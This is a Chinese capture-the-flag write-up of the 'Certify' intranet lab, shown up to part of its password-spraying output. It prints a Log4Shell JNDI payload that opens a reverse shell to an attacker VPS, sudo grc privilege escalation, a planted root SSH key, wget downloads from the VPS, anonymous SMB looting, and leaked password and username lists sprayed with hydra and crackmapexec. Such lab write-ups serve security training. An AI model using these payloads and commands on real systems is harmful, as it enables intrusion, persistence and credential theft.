Certify - 春秋云境
Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
外网打点
fscan扫描
E:\渗透工具\漏扫\fxray-main\fxray-main\fscan>fscan.exe -h 39.98.127.63
██╗ ██╗ ███████╗██╗ ██╗██████╗
╚██╗██╔╝ ██╔════╝╚██╗██╔╝██╔══██╗
╚███╔╝█████╗█████╗ ╚███╔╝ ██████╔╝
██╔██╗╚════╝██╔══╝ ██╔██╗ ██╔═══╝
██╔╝ ██╗ ███████╗██╔╝ ██╗██║
╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝
xk version: 1.8.3
start infoscan
39.98.127.63:8983 open
39.98.127.63:80 open
39.98.127.63:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.98.127.63 code:200 len:612 title:Welcome to nginx!
[*] WebTitle http://39.98.127.63:8983 code:302 len:0 title:None 跳转url: http://39.98.127.63:8983/solr/
[*] WebTitle http://39.98.127.63:8983/solr/ code:200 len:16555 title:Solr Admin
信息收集solr8.11.0
搜索自己的漏洞库搜索到了
首先在服务器上启动一个ldap
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i VPSIP直接打POC:
http://39.98.127.63:8983/solr/admin/collections?action=${jndi:ldap://VPSIP:1389/Basic/ReverseShell/VPSIP/9999}&wt=json然后浏览器直接访问
成功拿下
可以看到权限比较低
grc提权
执行sudo -l 可以看到/usr/bin/grc可以在无密码的情况下执行sudo权限
sudo /usr/bin/grc --pty /bin/sh
可以看到提权成功然后我们用python3搞个维权终端
python3 -c 'import pty; pty.spawn("/bin/bash")'
拿下flag01
为了方便后渗透我们写公钥上去
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDp91SSytx8VwCP/zzN6IHd7IjGK1JJjqd3rPtIxD4mWmcJY77Oh9VlFvqgwaF1/kmGQQsitO3oEwvmgtMtLBJzrsNSdD7H6GNxHUyEExJi78yddrEURl3UKdmDgl8oC2HVQUhZpaQesWVUQSEFSsaFkR4cERm/KXRrGULKgjpFit5deJw0h4n5d070cnQ7C0JUmN+4rQDGKUSXqrZjkWRilpm/23TJBgGFkn9WfzD6MIQIDJl7YV7tMYbFg9xakQwmUcca/EtYXps5V6neiU+p0VZsZjgp4qf03sIJwT0yurpFOPXEwDUIHLbZWX6HE9wrym9UwUpyw6urirBDal/YdvuRhnpu+pCC5bJGSbedQleM3nvv+Zr8gwGHphBxJ/AjrFtBE092/A4MByK5UnevW6QynDLb2sr1qDG0XKv7D2+EdL2w/CClcQq1pWLR0nIbCGAc7Nw4RPdVXj90yGG1S1RS6Q0exWj7CkF7l5RdW0PbLB3dvy/6s6RAOzaaBA8=" > /root/.ssh/authorized_keys
然后可以尝试直接从服务器ssh上去了
ssh root@39.98.127.63
内网横向
远程下载frp和fscan
wget https://VPSIP:Port/fscan
wget https://VPSIP:Port/frpc
wget https://VPSIP:Port/frpc.ini当然除了这些要下的还有些东西我们可以从我们的服务器上scp过去
scp * root@39.98.127.63:/root
fscan和nmap扫描
现在我们用fscan进行内网扫描,首先查看一下IP
ifconfig
./fscan -h 172.22.9.19/24 -hn 172.22.9.19root@ubuntu:~# ./fscan -h 172.22.9.19/24 -hn 172.22.9.19
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.9.47 is alive
(icmp) Target 172.22.9.7 is alive
(icmp) Target 172.22.9.26 is alive
[*] Icmp alive hosts len is: 3
172.22.9.26:445 open
172.22.9.7:445 open
172.22.9.47:445 open
172.22.9.26:139 open
172.22.9.7:139 open
172.22.9.47:139 open
172.22.9.26:135 open
172.22.9.7:135 open
172.22.9.7:80 open
172.22.9.47:80 open
172.22.9.7:88 open
172.22.9.47:22 open
172.22.9.47:21 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo
[*]172.22.9.26
[->]DESKTOP-CBKTVMO
[->]172.22.9.26
[*] NetBios 172.22.9.7 [+] DC:XIAORANG\XIAORANG-DC
[*] NetInfo
[*]172.22.9.7
[->]XIAORANG-DC
[->]172.22.9.7
[*] WebTitle http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.9.47 (Windows 6.1)
[*] NetBios 172.22.9.47 fileserver Windows 6.1
[*] WebTitle http://172.22.9.7 code:200 len:703 title:IIS Windows Server
[+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect # 如果服务器上没有怎么办,可以apt install nmap -y
nmap -sC -sV --min-rate=1000 172.22.9.0/24Nmap scan report for 172.22.9.7
Host is up (0.00031s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-28 11:20:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: xiaorang.lab0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=XIAORANG-DC.xiaorang.lab
| Subject Alternative Name: othername:<unsupported>, DNS:XIAORANG-DC.xiaorang.lab
| Not valid before: 2025-08-28T10:57:19
|_Not valid after: 2026-08-28T10:57:19
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: xiaorang.lab0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=XIAORANG-DC.xiaorang.lab
| Subject Alternative Name: othername:<unsupported>, DNS:XIAORANG-DC.xiaorang.lab
| Not valid before: 2025-08-28T10:57:19
|_Not valid after: 2026-08-28T10:57:19
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: xiaorang.lab0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=XIAORANG-DC.xiaorang.lab
| Subject Alternative Name: othername:<unsupported>, DNS:XIAORANG-DC.xiaorang.lab
| Not valid before: 2025-08-28T10:57:19
|_Not valid after: 2026-08-28T10:57:19
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: xiaorang.lab0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=XIAORANG-DC.xiaorang.lab
| Subject Alternative Name: othername:<unsupported>, DNS:XIAORANG-DC.xiaorang.lab
| Not valid before: 2025-08-28T10:57:19
|_Not valid after: 2026-08-28T10:57:19
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: XIAORANG
| NetBIOS_Domain_Name: XIAORANG
| NetBIOS_Computer_Name: XIAORANG-DC
| DNS_Domain_Name: xiaorang.lab
| DNS_Computer_Name: XIAORANG-DC.xiaorang.lab
| Product_Version: 10.0.17763
|_ System_Time: 2025-08-28T11:23:14+00:00
| ssl-cert: Subject: commonName=XIAORANG-DC.xiaorang.lab
| Not valid before: 2025-08-27T10:35:58
|_Not valid after: 2026-02-26T10:35:58
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/28%Time=68B03BA0%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
MAC Address: EE:FF:FF:FF:FF:FF (Unknown)
Service Info: Host: XIAORANG-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 172.22.9.26
Host is up (0.00029s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: XIAORANG
| NetBIOS_Domain_Name: XIAORANG
| NetBIOS_Computer_Name: DESKTOP-CBKTVMO
| DNS_Domain_Name: xiaorang.lab
| DNS_Computer_Name: DESKTOP-CBKTVMO.xiaorang.lab
| DNS_Tree_Name: xiaorang.lab
| Product_Version: 10.0.14393
|_ System_Time: 2025-08-28T11:23:14+00:00
| ssl-cert: Subject: commonName=DESKTOP-CBKTVMO.xiaorang.lab
| Not valid before: 2025-08-27T10:35:45
|_Not valid after: 2026-02-26T10:35:45
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
MAC Address: EE:FF:FF:FF:FF:FF (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: DESKTOP-CBKTVMO, NetBIOS user: <unknown>, NetBIOS MAC: 00:16:3e:23:2d:02 (Xensource)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-08-28T11:23:14
|_ start_date: 2025-08-28T10:35:45
Nmap scan report for 172.22.9.47
Host is up (0.00036s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 95:4d:3a:fd:c1:ba:8a:76:ed:67:c4:fe:7a:51:28:82 (RSA)
| 256 f2:c8:ee:a4:bd:aa:c4:9f:56:84:74:27:45:21:77:23 (ECDSA)
|_ 256 93:46:a0:84:24:86:a9:59:c7:d8:1e:7b:46:f8:a8:b0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: EE:FF:FF:FF:FF:FF (Unknown)
Service Info: Host: FILESERVER; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: FILESERVER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: fileserver
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: fileserver
|_ System time: 2025-08-28T19:23:15+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-08-28T11:23:15
|_ start_date: N/A可以看到是域渗透
172.22.9.7 DC:XIAORANG\XIAORANG-DC
172.22.9.47 fileserver
172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab
172.22.9.19 已拿下通外网的机器我们要理清楚这个域关系必须从AD层面把这几台机器的关系理清楚
从 Active Directory 的角度看,这四个 IP 扮演的角色可以这样理解:
1. 172.22.9.7 — XIAORANG-DC
典型域控端口开放:53 (DNS)、88 (Kerberos)、389/636 (LDAP/LDAPS)、445 (SMB)、3268/3269 (全局编录 GC)、3389 (RDP)。
证书信息:CN = XIAORANG-DC.xiaorang.lab,表明它是域的权威认证节点。
服务特征:
Kerberos、LDAP → 提供身份认证与目录服务。
DNS → 提供 AD 域名解析。
IIS 80 端口 + AD CS (
poc-yaml-active-directory-certsrv-detect) → 有可能安装了证书服务 (ADCS)。
结论:这是 域控制器 (Domain Controller, DC),是域 xiaorang.lab 的核心。
2. 172.22.9.26 — DESKTOP-CBKTVMO
NetBIOS/DNS 名称:DESKTOP-CBKTVMO.xiaorang.lab,已经加入域。
系统版本:Windows Server 2016 Datacenter (Product Version 10.0.14393)。
端口特征:
135/139/445 (MSRPC/SMB)。
3389 (RDP)。
安全信息:
SMB 签名 未启用(容易被中间人/relay 攻击)。
NetBIOS 信息显示它挂在域 XIAORANG 下。
结论:尽管名字叫 "DESKTOP",但实际上是 域内成员服务器,有可能作为应用服务器或远程桌面主机在用。
3. 172.22.9.47 — FILESERVER
NetBIOS 名称:FILESERVER。
系统特征:Nmap 报 Linux (Ubuntu),同时运行 Samba,伪装成 Windows SMB 主机。
端口特征:
21 (FTP, vsftpd)。
22 (SSH, OpenSSH on Ubuntu)。
80 (Apache2 Ubuntu)。
139/445 (Samba 文件共享)。
混合环境:
主机名表明它是文件服务器。
实际上是 Linux 文件服务器 + Samba,与 Windows AD 环境兼容。
结论:这是域中的 文件共享服务器 (成员服务器),但运行 Linux,说明域里存在 异构系统。
4. 172.22.9.19
在你的输出里主要作为 扫描起点/通外网机器 出现,没有 Nmap 结果。
但已知它可以直接上网 → 在域环境里可能是一台 工作站或跳板机,未必是关键角色,但其安全状态很关键。
5. 总结 — AD 内的角色划分
172.22.9.7 → 域控制器 (Domain Controller),负责整个 AD 的认证、Kerberos、LDAP、DNS、可能还有证书服务。
172.22.9.26 → 成员服务器 (Windows Server 2016),加入域,运行 SMB/RDP,可能是应用或远程桌面服务器。
172.22.9.47 → 文件服务器 (Linux + Samba),作为域内文件共享节点,同时提供 FTP/HTTP/SSH 服务。
172.22.9.19 → 出网主机/跳板机,可直接访问公网,潜在的域外通信桥梁。
SMB匿名登录
可以看到47的FILESERVER是有SMB的
我们先挂上frp然后直接打SMB过去,当然如果你不用smbclient.py想直接连也是可以的
proxychains smbclient.py 172.22.9.47输入命令
shares
# 查看共享文件
use filesharefileshare:这是管理员配置的普通文件共享,被设为可浏览、且允许匿名/来宾读取(或读写,取决于 smb.conf)。要对文件做目录/下载/上传等操作,必须先use fileshare选中它。IPC$:进程间通信共享,用于命名管道/RPC(枚举、会话建立等),不是用来存放文件的,不能在里面ls普通目录。print$:打印机驱动共享,给客户端拉取驱动用,通常只读且权限受限,也不作为通用文件盘使用。
因此在 Impacket 的交互里,shares 只是告诉你有哪些共享;真正要访问文件,需要先选中一个可用的数据共享。目前能给匿名访问的只有 fileshare
执行ls可以看到下面有一些文件,有一个secret
cd secret
ls
cat flag02.txt
get personnel.db当然如果get不下来我们用另一种匿名登陆的方式
└─# proxychains smbclient \\\\172.22.9.47\\fileshare -U anonymous然后一样操作一遍就行了
看一下这个db有啥
最后可以得到有四个可能有效的密码为
admin
i9XDE02pLVf
6N70jt2K9sV
fiAzGwEMgTY一堆可能有效的用户名为
huangmin
zhangrong
liying
zhaoli
zhangyan
zhoujing
liuying
wanghao
wangqiang
wanglu
zhaoyong
zhangli
wangning
wangyu
yangli
zhangqian
lishuai
yangliu
wangying
chenjie
yangyong
lipeng
lixin
liukai
machao
lijia
zhangping
zhanghui
zhangwen
wangmin
chenlin
chenjuan
lining
wangwei
zhangnan
wangxia
zhangyu
chenchen
wangbing
lilin
zhangling
chenling
yangmei
liuqiang
lihong
lilei
wanghuan
wangxin
yangping
lijie
wangqian
liping
liuhui
zhangming
zhangying
libo
liuqin
wangchao
liuli
yangwei
wangyan
wangjian
zhangbin
wangli
wangdan
liuxia
zhangrui
wangdong
wangting
zhangjian
wanghua
liyan
liufeng
zhangbo
liuming
liujia
chentao
zhangting
liushuai
lijing
wangbin
lijian
zhouyong
liudan
yangbin
liupeng
chenjun
wangbo
libin
zhaowei
lijuan
chenchao
wangming
lifang
wangtao
liufang
litao
yangling
yangxue
liubin
yangyang
xuwei
chenyong
yangbo
zhanghua
zhaomin
chenping
zhanglei
zhangliang
zhangtao
zhangxue
liqian
liwei
chenbin
zhangyun
wangxue
zhouwei
likai
gaofeng
wanglei
lijun
liuwei
wanggang
liuping
zhangning
libing
zhangchao
zhangxia
limin
liulei
wangling
zhangfei
chenlong
liufei
chenli
chenyan
chenpeng
wangrui
zhangfeng
yanglin
liutao
liyong
wangna
wangjuan
wanghui
lilong
lili
zhangshuai
zhangfan
liujing
liuqian
yangfang
chenqiang
liqiang
yangjun
chenbo
zhangyong
wangliang
wangxu
chenhua
zhouli
liubing
zhaojing
yangyan
chenfang
zhanghao
wangyun
zhangxin
zhangwei
wangping
wangkai
liuchang
lixue
lina
liwen
liming
liling
chenwei
lihao
wanglin
zhanglin
xumin
liuyan
zhangmin
zhangqiang
yangchao
yanghua
ligang
liuxin
liuhuan
lifeng
liugang
yangtao
liuhao
lichao
yanghong
chenhong
sunwei
zhanghong
zhangdan
liumin
wangmei
zhangjing
liujun
wangyong
huangyong
lixiang
zhoujie
liuchao
liuna
wangjing
liuling
chenjing
wangqin
wanglong
chenlei
yangjie
zhangjun
yangming
zhangmei
wangrong
zhangpeng
liuyun
wangkun
chenmin
liqin
wangfang
liuhua
zhangqin
zhanglong
zhangjie
liliang
liyun
wangcheng
yangjing
chenying
lihua
liumei
yangjuan
lidan
liyang
zhaojun
liuyong
zhoumin
chenyun
chenmei
wangjie
wangfei
chenxin
chenfei
wangyang
chenhao
lifei
zhangfang
zhangkun
liujuan
lirong
wangjun
yanglei
wangfeng
chenxia
wangshuai
wangpeng
zhangkai
liuyu
zhangxu
chenming
mali
lihui
liuyang
liujie
limei
chengang
liubo
huangwei
liuhong
wanghong
lixia
xujing
liting
zhangna
zhangjuan
chenhui
liuting
yangmin
yangfan
chenliang
zhangjianhua
wangjinfeng
liujianjun
zhanghongmei
lixiurong
chenxiuzhen
lijianguo
zhangguizhen
zhangxiurong
litingting
wuxiuying
chenyulan
zhangyuying
liyuzhen
wanglanying
lijianhua
zhangguilan
liyulan
wangjianping
liuguiying
lijianjun
wangzhiqiang分别设置成username.txt和pass.txt
然后我们直接做密码喷洒
proxychains hydra -L username.txt -P pass.txt 172.22.9.26 rdp >>result.txt
cat result.txt|| grep account
或者
proxychains crackmapexec smb 172.22.9.26 -u username.txt -p pass.txt 2>/dev/null其实想想就知道要扫26,DC不可能现在就给你
这个密码喷洒很耗时间,大概要十几分钟
└─# proxychains crackmapexec smb 172.22.9.26 -u username.txt -p pass.txt 2>/dev/null
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [*] Windows Server 2016 Datacenter 14393 x64 (name:DESKTOP-CBKTVMO) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\huangmin:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\huangmin:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\huangmin:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\huangmin:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangrong:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangrong:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangrong:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liying:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liying:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liying:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liying:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoli:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoli:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoli:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoli:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangyan:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangyan:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhoujing:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhoujing:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhoujing:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuying:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuying:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuying:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuying:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanghao:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanghao:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanghao:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanghao:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangqiang:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangqiang:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangqiang:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangqiang:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanglu:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanglu:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanglu:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoyong:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoyong:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoyong:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoyong:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangli:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangli:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangli:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangli:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangning:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangning:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangning:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangning:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangyu:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangyu:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangyu:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangyu:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangli:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangli:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangli:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangli:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangqian:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangqian:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangqian:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lishuai:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lishuai:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lishuai:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lishuai:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangliu:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangliu:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangying:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangying:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangying:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangying:fiAzGwEMgTY STATUS_LOGON_FAILURE
